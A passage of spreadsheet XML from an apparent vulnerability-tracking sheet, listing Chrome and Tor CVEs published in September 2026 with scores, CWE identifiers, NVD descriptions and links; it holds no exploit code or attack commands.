        <v>6.5</v>
      </c>
      <c r="E775" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L775" s="5" t="inlineStr"/>
      <c r="M775" s="5" t="inlineStr"/>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr"/>
      <c r="Q775" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="R775" s="5" t="inlineStr">
        <is>
          <t>Incomplete cleanup in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87549</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87565</t>
        </is>
      </c>
      <c r="D776" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E776" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F776" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L776" s="5" t="inlineStr"/>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr"/>
      <c r="Q776" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R776" s="5" t="inlineStr">
        <is>
          <t>Information leak in Passwords in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87565</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87580</t>
        </is>
      </c>
      <c r="D777" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E777" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F777" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L777" s="5" t="inlineStr"/>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr"/>
      <c r="Q777" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R777" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in WebAppInstalls in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87580</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87584</t>
        </is>
      </c>
      <c r="D778" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E778" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F778" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr"/>
      <c r="K778" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L778" s="5" t="inlineStr"/>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr"/>
      <c r="Q778" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R778" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in WebUI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87584</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87589</t>
        </is>
      </c>
      <c r="D779" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E779" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F779" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr"/>
      <c r="K779" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L779" s="5" t="inlineStr"/>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr"/>
      <c r="Q779" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R779" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87589</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87591</t>
        </is>
      </c>
      <c r="D780" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E780" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F780" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr"/>
      <c r="K780" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L780" s="5" t="inlineStr"/>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr"/>
      <c r="Q780" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R780" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87591</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87593</t>
        </is>
      </c>
      <c r="D781" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E781" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F781" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L781" s="5" t="inlineStr"/>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr"/>
      <c r="Q781" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R781" s="5" t="inlineStr">
        <is>
          <t>Information leak in Editing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87593</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87600</t>
        </is>
      </c>
      <c r="D782" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E782" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F782" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L782" s="5" t="inlineStr"/>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr"/>
      <c r="Q782" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R782" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Safebrowsing in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87600</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87603</t>
        </is>
      </c>
      <c r="D783" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E783" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F783" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr"/>
      <c r="K783" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L783" s="5" t="inlineStr"/>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr"/>
      <c r="Q783" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R783" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87603</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87610</t>
        </is>
      </c>
      <c r="D784" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E784" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F784" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G784" s="5" t="inlineStr"/>
      <c r="H784" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I784" s="5" t="inlineStr"/>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P784" s="5" t="inlineStr"/>
      <c r="Q784" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R784" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Omnibox in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87610</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87620</t>
        </is>
      </c>
      <c r="D785" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E785" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F785" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G785" s="5" t="inlineStr"/>
      <c r="H785" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I785" s="5" t="inlineStr"/>
      <c r="J785" s="5" t="inlineStr"/>
      <c r="K785" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P785" s="5" t="inlineStr"/>
      <c r="Q785" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="R785" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in SVG in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87620</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87623</t>
        </is>
      </c>
      <c r="D786" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E786" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F786" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I786" s="5" t="inlineStr"/>
      <c r="J786" s="5" t="inlineStr"/>
      <c r="K786" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P786" s="5" t="inlineStr"/>
      <c r="Q786" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="R786" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in DOM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87623</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87626</t>
        </is>
      </c>
      <c r="D787" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E787" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F787" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr"/>
      <c r="K787" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L787" s="5" t="inlineStr"/>
      <c r="M787" s="5" t="inlineStr"/>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr"/>
      <c r="Q787" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R787" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DeviceBoundSessionCredentials in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87626</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87627</t>
        </is>
      </c>
      <c r="D788" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E788" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F788" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr"/>
      <c r="K788" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L788" s="5" t="inlineStr"/>
      <c r="M788" s="5" t="inlineStr"/>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr"/>
      <c r="Q788" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="R788" s="5" t="inlineStr">
        <is>
          <t>Interpretation conflict in Safebrowsing in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted file. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87627</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87629</t>
        </is>
      </c>
      <c r="D789" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E789" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F789" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr"/>
      <c r="Q789" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R789" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Sources in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87629</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87631</t>
        </is>
      </c>
      <c r="D790" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E790" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F790" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr"/>
      <c r="K790" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr"/>
      <c r="Q790" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R790" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in DOM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87631</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87724</t>
        </is>
      </c>
      <c r="D791" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E791" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F791" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr"/>
      <c r="K791" s="5" t="inlineStr"/>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr"/>
      <c r="Q791" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="R791" s="5" t="inlineStr">
        <is>
          <t>Tor before 0.4.9.12 interprets the CC_RESPONSE extension even when CC_REQUEST was not sent, which allows remote attackers to cause a denial of service (crash) because of corrupted congestion-control state. This is TROVE-2026-032.</t>
        </is>
      </c>
      <c r="S791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87724</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87809</t>
        </is>
      </c>
      <c r="D792" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E792" s="5" t="inlineStr">
        <is>
